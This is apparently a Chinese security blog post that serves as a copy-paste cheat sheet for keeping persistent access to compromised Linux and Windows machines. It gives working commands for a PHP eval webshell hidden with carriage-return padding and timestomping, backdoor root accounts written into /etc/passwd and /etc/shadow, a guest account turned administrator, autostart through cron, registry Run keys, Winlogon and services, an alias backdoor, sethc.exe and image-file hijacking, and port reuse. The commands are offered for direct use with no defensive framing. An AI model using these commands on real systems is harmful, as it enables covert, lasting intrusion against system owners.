权限维持


隐匿文件

Linux

  • 内容隐藏
printf "<?=@eval(\$_REQUEST['code']);?>\r%-50s\n" > backup.php
  • 文件时间
touch -r index.php backup.php
touch -t 201406121017.34 backup.php
  • 文件锁定
chattr +i backup.php

Windows

  • 文件隐藏
attrib +s +a +h +r D:\PHPStudy\WWW\backup.php
  • ADS隐藏
#XP之后ADS文件无执行权限
echo ^<?=@eval($_REQUEST['code']);?^> > index.php:mm
  • 文件时间
(ls backup.php).CreationTime="2014-06-12 10:17:34"
(ls backup.php).LastWriteTime="2014-06-12 10:17:34"
(ls backup.php).LastAccessTime="2014-06-12 10:17:34"

用户管理

Linux

  • 普通账户
cp /bin/bash /bin/nologin && chmod u+s /bin/nologin
sed -i "17i\usr:x:40:40:usr:/usr/sbin:/bin/nologin" /etc/passwd
sed -i "17i\usr:$(openssl passwd -1 admin@888..):18375:0:99999:7:::" /etc/shadow
  • 系统账户
ln -s /bin/bash /bin/nologin
sed -i "3i\usr:x:0:0:usr:/usr/sbin:/bin/nologin" /etc/passwd
sed -i "3i\usr:$(openssl passwd -1 admin@888..):18375:0:99999:7:::" /etc/shadow
  • 密钥登录
ln -s /bin/bash /bin/nologin && setcap cap_setuid+ep /bin/python
sed -i "17i\usr:x:40:40:usr:/var/local:/bin/nologin" /etc/passwd
sed -i "17i\usr:*:18375:0:99999:7:::" /etc/shadow
mkdir /var/local/.ssh && echo "***" > /var/local/.ssh/authorized_keys
python -c "import os, pty; os.setuid(0); pty.spawn('/bin/bash')"

Windows

  • 来宾账户
net user guest admin@888..
net user guest /active:yes
net localgroup administrators guest /add
  • VBS 脚本
UserName = WScript.Arguments(0)
PassWord = WScript.Arguments(1)
WinNT = "WinNT://" & CreateObject("WScript.Network").ComputerName
Set Admin = GetObject(WinNT & "/Administrators, Group")
If UCase(UserName) = "GUEST" Then
Set User = GetObject(WinNT & "/Guest")
User.AccountDisabled = FALSE
Else
Set User = GetObject(WinNT).Create("User", UserName)
End If
User.SetPassword PassWord
User.SetInfo
Admin.add WinNT & "/" & UserName

开机自启

Linux

  • 启动脚本
/etc/bashrc
/etc/profile
/etc/profile.d/*
/etc/rc.d/init.d/*
/etc/rc.d/rc.local
  • 计划任务
sed -i "\$i\\$(printf '59 23 * * * root 执行命令 &> /dev/null\r%-80s\n')" /etc/crontab
#/etc/cron.hourly--时, /etc/cron.daily--天, /etc/cron.weekly--周, /etc/cron.monthly--月
printf "执行命令 &> /dev/null\r%-60s\n" > /etc/cron.daily/文件名 && chmod 755 /etc/cron.daily/文件名

Windows

  • 注册表
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v 键名 /t REG_SZ /d "执行命令" /f
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v 键名 /t REG_SZ /d "执行命令" /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v 键名 /t REG_SZ /d "执行命令" /f
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v 键名 /t REG_SZ /d "执行命令" /f
  • 登录脚本
reg add "HKCU\Environment" /v UserInitMprLogonScript /t REG_SZ /d "程序路径" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "explorer.exe,执行命令" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Windows\System32\userinit.exe,执行命令" /f
  • 启动目录
#NT6以前
C:\Documents and Settings\All Users\Start Menu\Programs\StartUp
C:\Documents and Settings\%UserName%\Start Menu\Programs\StartUp
#NT6以后
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
C:\Users\%UserName%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
  • 系统服务
sc create 服务名称 binPath= "执行命令" start= "delayed-auto" obj= "LocalSystem"
sc description 服务名称 "服务描述内容"
  • 计划任务
#onStart--系统启动时, onLogon--用户登录时
schtasks /Create /tn "\Microsoft\Windows\任务名称\任务名称" /ru SYSTEM /sc onStart /tr "执行命令"

进程劫持

Linux

  • alias后门
printf "alias pwd='\$(执行命令 &> /dev/null)pwd'\r%-80s\n" >> ~/.bashrc && source ~/.bashrc

Windows

  • DLL劫持

  • 文件替换

takeown /A /F C:\Windows\System32\sethc.exe
cacls C:\Windows\System32\sethc.exe /E /G Everyone:F
cd C:\Windows\System32 && move sethc.exe sethc.bak && copy odbcad32.exe sethc.exe
  • 映像劫持
#直接触发执行
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\odbcad32.exe" /f
#静默退出执行
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\sethc.exe" /v ReportingMode /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\sethc.exe" /v MonitorProcess /t REG_SZ /d "执行命令" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v GlobalFlag /t REG_DWORD /d 512 /f

端口复用

Linux

  • Iptables
#x.x.x.x --> Server:80 --> x.x.x.x:22
iptables -t nat -A PREROUTING -p tcp -s x.x.x.x --dport 80 -j DNAT --to x.x.x.x:22

Windows

  • WinRM
#启动WinRM
winrm quickconfig ‐q
#启用端口复用
winrm set winrm/config/Service @{EnableCompatibilityHttpListener="true"}
#更改监听端口
winrm set winrm/config/Listener?Address=*+Transport=HTTP @{Port="80"}
#设置信任连接
winrm set winrm/config/Client @{TrustedHosts="*"}

文章作者: DongHuangT1
版权声明: 本博客所有文章除特別声明外,均采用 CC BY-NC 4.0 许可协议。转载请注明来源 DongHuangT1 !
评论
 上一篇
系统提权 系统提权
╔═══════════════╗
║ “复制粘贴” 之系统提权 ║
╚═══════════════╝
2021-03-05
下一篇 
流量隧道 流量隧道
╔═══════════════╗
║ “复制粘贴” 之流量隧道 ║
╚═══════════════╝
2021-02-25
  目录